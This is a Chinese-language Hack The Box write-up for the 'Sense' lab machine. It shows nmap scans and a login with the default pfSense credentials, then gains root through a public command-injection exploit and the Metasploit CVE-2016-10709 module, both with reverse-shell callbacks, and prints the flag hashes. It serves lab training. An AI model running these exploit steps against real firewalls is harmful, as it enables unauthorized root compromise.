Sense-htb-writeup

0x00 靶场技能介绍

章节技能:默认口令搜索、pfSense2.1.3漏洞搜索、CVE-2016-10709、msf使用方法

参考链接:官网引导模式提示

0x01 用户权限获取

1、首先,我们获取下靶机的IP地址:10.10.10.60

2、使用nmap对靶机进行tcp与udp的双重扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU 10.10.10.60                     
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 19:56 CST
Nmap scan report for 10.10.10.60
Host is up (0.27s latency).
All 1000 scanned ports on 10.10.10.60 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 276.71 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC 10.10.10.60 --min-rate 200 -p- 
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 19:56 CST
Nmap scan report for 10.10.10.60
Host is up (0.28s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-title: Login

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 663.16 seconds

3、可以看到只开放了2个端口,那就先看下网站内容是什么吧

4、是一个登录框,且有个sense标识,一般都是这个cms的名字,我们通过谷歌找一下默认密码吧,不行的话,再进行目录遍历和密码爆破。

5、可可以找到了两个默认的登录密码,现在尝试登录下看看

6、后台的登录账号密码是:rohit:pfsense

7、后台功能翻了个遍,没有什么思路,先exploit-db上搜搜,有啥漏洞利用的没把,对个节点差点忘了,先瞅下系统版本先。

Name:pfSense.localdomain

Version:2.1.3-RELEASE (amd64)

8、版本确实有点老,距离现在来说的话,不过根据版本先看漏洞吧。

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit pfSense 2.1.3
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.ph | php/webapps/43560.py
------------------------------------------- ---------------------------------
Shellcodes: No Results

9、那有一个漏洞,先下载下来吧?

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m 43560
  Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
      URL: https://www.exploit-db.com/exploits/43560
     Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
    Codes: CVE-2014-4688
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/43560.py

10、那看一下这个exp如何使用吧

11、那我们先设置个监听,再运行这个exp把

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

┌──(kali㉿kali)-[~/桌面]
└─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 10086 --username rohit --password pfsense
CSRF token obtained
Running exploit...

12、我们成功的获取到反弹的shell命令

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 37485
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

13、好像有点不对,咋就直接root了 /捂脸

htb Released on 21 Oct 2017

Exploit Date: 2018-01-12

14、好像确实不对,靶机是17年10月,这个exploit是18年1月份的,这有点拿0day去打这个靶机的感觉了。。。

15、我再找找漏洞吧。。。

16、这边我继续使用谷歌,通过各种搜索,终于搜索到一个2016年的exp。

CVE-2016-10709

exploit/unix/http/pfsense_graph_injection_exec

17、结果用msf打了一下,发现还是不对 = =

18、行吧,毕竟靶机太老了2017年的靶机,不适合了,我看看官网的引导提示吧,先别看writeup

19、看来是漏了几个步骤,我补一下。

20、通过目录文件扫描,发现了存有用户信息的txt文件,但是我用目录扫描器是没扫出来,多个字典都试了。。

21、继续看引导模式

22、what are you doing???

23、这个esay题也太简单了吧?前面一直做的2023年的esay题,都是2-3个信息或漏洞组合到一块才拿到最终的rootshell的?这个2017年的直接exp一打完事了?oscp的题会这么简单吗 = =!

24、那我补充下msf进行 CVE-2016-10709 的流程操作吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
msf6 > search CVE-2016-10709

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/pfsense_graph_injection_exec

msf6 > use exploit/unix/http/pfsense_graph_injection_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/http/pfsense_graph_injection_exec) > show options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
USERNAME => rohit
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted JpbAUuFR
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.60:7882) at 2023-12-03 23:05:21 +0800

meterpreter > shell
Process 35199 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/var/db/rrd
cd /home
ls
.snap
rohit
cd rohit/

ls
.tcshrc
user.txt
cat user.txt
8721327cc232073b40d27d9c17e7348b

0x02 系统权限获取

25、获取root的flag的过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cd /root/
ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
cat root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86

exit
[-] core_channel_interact: Operation failed: 1
meterpreter >

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/111

打靶记
#shooting-range
Sense-htb-writeup
https://sh1yan.top/2023/12/03/Sense-htb-writeup/
作者
shiyan
发布于
2023年12月3日
许可协议